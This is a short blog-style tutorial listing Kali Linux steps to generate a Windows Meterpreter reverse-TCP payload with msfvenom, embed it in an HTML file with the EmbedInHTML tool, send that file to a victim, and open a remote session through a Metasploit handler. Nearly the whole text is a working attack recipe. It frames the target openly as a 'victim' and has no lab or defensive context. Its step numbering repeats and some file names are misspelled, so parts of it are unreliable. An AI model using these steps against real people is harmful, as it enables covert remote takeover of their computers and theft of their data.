HERE IS TRICKS AND TECHNOLOGY
KALI LINUX COMMANDS
open the terminal in kali linux
STEP 1 git clone https://github.com/Arno0x/EmbedInHTML.git
STEP 2 ls
STEP 3 cd embedinHTML
STEP 4 ls
STEP 5 python embledhtml.py
STEP 6 for general instruction
STEP 7 you want create payload first using msfvenom
STEP 8 msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber -f exe>filename.exe
STEP 9 now your payload is ready
STEP 10 embedInHTML.py -k tamilcode -f tamilcode.exe -o tamilcode.html
example embedInHTML.py -k your password -f payload name -o testing.html
now your file will be ready
STEP 11 your file will be located in output folder
STEP 12 open the output file
STEP 13 send the file to victim
STEP 12 open the terminal type msfconsole
STEP 13 use exploit/multi/handler
STEP 14 set payload windows/meterpreter/reverse_tcp
STEP 15 set LHOST yourip
STEP 16 set LPORT portnumber
STEP 17 run
NOW TO SESSION WILL OPEN AND ATTACK THE VICTIM USING HELP
COMMANDS
0 Comments